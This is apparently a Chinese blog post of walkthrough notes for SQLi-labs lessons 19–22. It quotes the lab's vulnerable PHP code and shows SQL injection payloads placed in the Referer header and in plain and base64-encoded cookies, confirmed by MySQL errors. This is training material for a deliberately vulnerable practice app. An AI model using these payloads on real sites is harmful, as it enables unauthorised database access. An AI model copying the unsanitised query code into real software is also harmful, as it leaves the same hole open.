sqli labs 4
2016-10-13 12:15
267 查看
1. 题目19:
2.题目20:
3.题目21
3.题目22:
题目19中的注入是header 头注入,要想注入的前提是知道用户名,密码 $row1 = mysql_fetch_array($result1); if($row1) { echo '<font color= "#FFFF00" font size = 3 >'; $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')"; mysql_query($insert); //echo 'Your IP ADDRESS is: ' .$IP; echo "</font>"; //echo "<br>"; echo '<font color= "#0000ff" font size = 3 >'; echo 'Your Referer is: ' .$uagent; echo "</font>"; echo "<br>"; print_r(mysql_error()); echo "<br><br>"; echo '<img src="../images/flag.jpg" />'; echo "<br>"; } 所以注入在: Referer 构造referer: aa','') # 页面正常显示 构造referer:aa' 页面报错,因此这里存在注入 利用:Referer:' or 1=(select count(*) from usersw) ,'')# 报错:Table 'security.usersw' doesn't exist
2.题目20:
读源码: 设置cookie: a' post数据:uname=afda&passwd=d 后面没有submit 提交后报错:Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aa'''''' LIMIT 0,1' at line 1 ok,注入找见了,是cookie注入,利用 cookie: uname=aa' and (select count(*) from aa) >0 # 报错:Issue with your mysql: Table 'security.aa' doesn't exist
3.题目21
直接上源码分析: echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>"; echo '<font color= "orange" font size = 5 >'; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); $cookee = base64_decode($cookee); echo "<br></font>"; $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"; $result=mysql_query($sql); if (!$result) { die('Issue with your mysql: ' . mysql_error()); } $row = mysql_fetch_array($result); post 数据: uname=admin1ds&passwd=fda cookie中的uname base64 加密 设置cookie:uname=' 加密后:cookie: uname=Jw== 提交页面报错:Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1 设置cookie: uname=') and (select count(*) from user)>0 # 加密后: cookie: uname=JykgYW5kIChzZWxlY3QgY291bnQoKikgZnJvbSB1c2VyKT4wICM= 返回错误:Issue with your mysql: Table 'security.user' doesn't exist ok,注入找见了
3.题目22:
直接上源代码: echo '<font color= "orange" font size = 5 >'; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); $cookee = base64_decode($cookee); $cookee1 = '"'. $cookee. '"'; echo "<br></font>"; $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1"; $result=mysql_query($sql); if (!$result) { die('Issue with your mysql: ' . mysql_error()); } $row = mysql_fetch_array($result); if($row) { post 数据: uname=admin1ds&passwd=fda cookie中的uname base64 加密 sql语句是:SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1
相关文章推荐
- SQLi-Labs 学习笔记(Less 1-10)
- SQL注入之手工注入sqli-labs-master
- ④sqlilabs的less-3和less-4
- Sqli-labs less 46
- Sqli-labs less 12
- SQLi Labs Lesson22
- Sqli-labs less 65
- Sqli-labs less 45
- Sqli-labs less 31
- 【SQL注入之sqli-labs】Less 1 - Less 5 练习笔记
- Sqli-LABS通关笔录-12
- Sqli-Labs专业SQL注入测试平台
- Sqli-labs less 64
- SQL注入练习平台sqli-labs
- Sqli-labs less 44
- Sqli-labs less 29
- Sqli-labs less 9
- SQLi Labs Lesson20
- Sqli-labs学习SQL注入-Lesson 1-10总结
- SQLi Labs Lesson29 & Lesson30 & Lesson31